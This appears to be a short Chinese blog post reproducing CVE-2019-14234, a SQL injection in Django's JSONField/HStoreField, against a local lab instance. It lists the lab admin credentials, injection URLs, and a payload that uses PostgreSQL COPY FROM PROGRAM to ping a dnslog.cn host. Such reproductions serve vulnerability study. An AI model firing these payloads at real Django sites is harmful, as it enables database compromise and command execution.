Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
2024-08-28 06:19:59
复现
访问http://192.168.49.2:8000/admin
输入用户名admin ,密码a123123123
然后构造URL进行查询,payload:
http://192.168.49.2:8000/admin/vuln/collection/?detail__a'b=123
http://192.168.49.2:8000/admin/vuln/collection/?detail__title')='1' or 1=1--
发现存在sql注入
使用dnslog检测是否可以执行命令
http://192.168.49.2:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping q60qaa.dnslog.cn'--%20
最新文章
- JavaScript高级程序设计-(4) 引用类型
- Android资源站
- 谢欣伦 - OpenDev原创例程 - 串口助手Comm Assist
- Android—对话框
- Css 单图片按钮实例(css 图片变换)
- [resource]23个python的机器学习包
- Handler sendMessage 与 obtainMessage (sendToTarget)
- Index Full Scan vs Index Fast Full Scan-1103
- spring简单入门示例
- mysql 查询重复的(不区分大小写)数据的SQL优化
- UITextField总结--博主总结的真好
- 如何判断浏览器为ie10以上
- 如何在ASP.NET Core Web API测试中使用Postman
- Python基础之协程
- vs2017 在win10下安装后开始运行asp.net core 项目时出错
- Django框架----视图(views)
- 含有选择器的 bootstrap菜单
- 【转】细谈Redis和Memcached的区别
- 使用msiexec.exe绕过应用程序白名单(多种方法)
- nodejs学习笔记四(模块化、在npm上发布自己的模块)
热门文章
- MIT6.828 Lab2 内存管理
- npm ERR! Unexpected end of JSON input while parsing near '...'解决方法
- Centos7安装配置jenkins(Tomcat)
- kubernetes的存活探针和就绪探针
- 单片机引脚扩展芯片74HC595手工分解实验
- layui 监听checkbox 、radio、switch选中改变事件
- Redis主从,集群部署及迁移
- Java Set HashSet
- 深入理解 Go Map
- Redis和Memcached到底有什么区别?